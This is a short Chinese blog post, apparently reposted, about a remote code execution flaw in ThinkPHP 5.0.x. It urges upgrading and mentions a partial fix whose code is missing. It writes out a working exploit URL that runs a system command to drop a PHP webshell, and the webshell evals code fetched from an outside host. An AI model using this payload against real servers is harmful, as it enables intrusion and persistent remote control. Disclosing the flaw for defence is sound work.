THINKPHP5近期暴露的漏洞


這個THINKPHP5的漏洞涉及好幾個版本,我測試中5.0.21和5.0.22都有,據說是5.0 ~ 5.0.23之間的版本都存在,這個漏洞可以執行寫文件的操作。

當然了,趕緊升級框架到安全版本是比較好的方式,不過我這邊測試了一下,發現確實可以通過url訪問注入進行執行寫文件操作,例如

http://你的域名/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval(file_get_contents("http%3a%2f%2fcqy666.cn%2fphp.jpg"))?^>>test.php

之后在public下面發現了一個PHP文件 是 test.php

內容如下

訪問test.php發現

我本地執行是這樣的

 

 然后就沒有然后了 多么可怕!

網上有人說的解決方案是找到 thinkphp/library/think/App.php文件第556行那里

改為

對控制器進行一次過濾,當然為了保險還是要把配置的路由那里改一下

'url_route_on'           => true,


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM